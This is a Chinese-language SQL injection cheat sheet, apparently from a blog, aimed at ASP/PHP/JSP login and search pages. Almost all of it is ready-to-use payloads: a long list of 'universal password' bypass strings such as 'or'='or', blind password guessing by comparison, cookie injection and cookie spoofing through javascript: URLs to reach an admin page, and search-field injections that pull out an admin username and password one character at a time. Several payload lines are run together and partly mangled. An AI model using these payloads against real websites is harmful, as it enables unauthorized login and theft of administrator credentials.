另类登录注入形式:
经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。
猜解思路可以构造,user_name: xxx'and password>'a 如果password第一位大于a,则继续user_name: xxx'and password>'b.
View Code
seelct * from admin where username='admin' and password=''注入方法:
万能用户名: xxx' union select * from users/*
select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;
万能密码:
用户名:admin'or'1'='1密码:'or'2'='2username:'or 1=1 or''=' passwd:随便写'or'='or'
'or''='
'or 1=1"or"="
'or 1=1/* php"or"a"="a"or 1=1--"or"="
"or"="a'='a"or1=1--"or=or"
''or'='or'
') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1'
'or''='
'or''=''or''=' !!!!!
'or'='1'
'or'='or'
'or.'a.'='a'or1=1--
1'or'1'='1a'or' 1=1--a'or'1=1--or'a'='a'or1=1--or1=1--
View Code
cookie注入:
http://xxxx/view.asp?id=23先访问http://xxxx/view.asp?id=23接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("23 and 1=1"))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))
再访问:http://xxxx/view.asp(出错)
该页面出错就表示可以用Cookie注入。
View Code
cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp
搜索型注入
例如:
判断注入1%'and 1=1 and'%'='
1%'and 1=2 and'%'='判断是否存在表1%'and(select count(*)from admin)>0 and'%'='判断是否存在字段段1%'and(select top 1 len(username)from admin) and'%'='
1%'and(select top 1 len(password)from admin) and'%'='猜字段中的内容范围1%'and(select top 1 asc(mid(username,1,1))from admin)>102 and'%'='
1%'and(select top 1 asc(mid(username,1,1))from admin)>40 and'%'='
1%'and(select top 1 asc(mid(username,1,1))from admin)=97 and'%'='
1%'and(select top 1 asc(mid(username,2,1))from admin)=100 and'%'='
1%'and(select top 1 asc(mid(username,3,1))from admin)=109 and'%'='
1%'and(select top 1 asc(mid(username,4,1))from admin)=105 and'%'='
1%'and(select top 1 asc(mid(username,5,1))from admin)=110 and'%'='
1%'and(select top 1 asc(mid(password,1,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,2,1))from admin)=52 and'%'='
1%'and(select top 1 asc(mid(password,3,1))from admin)=50 and'%'='
1%'and(select top 1 asc(mid(password,4,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,5,1))from admin)=53 and'%'='
1%'and(select top 1 asc(mid(password,6,1))from admin)=68 and'%'='
1%'and(select top 1 asc(mid(password,7,1))from admin)=51 and'%'='
1%'and(select top 1 asc(mid(password,8,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,9,1))from admin)=50 and'%'='
1%'and(select top 1 asc(mid(password,10,1))from admin)=49 and'%'='
1%'and(select top 1 asc(mid(password,11,1))from admin)=57 and'%'='
1%'and(select top 1 asc(mid(password,12,1))from admin)=52 and'%'='
1%'and(select top 1 asc(mid(password,13,1))from admin)=43 and'%'='
1%'and(select top 1 asc(mid(password,14,1))from admin)=51 and'%'='
1%'and(select top 1 asc(mid(password,15,1))from admin)=68 and'%'='
1%'and(select top 1 asc(mid(password,16,1))from admin)=51 and'%'='
View Code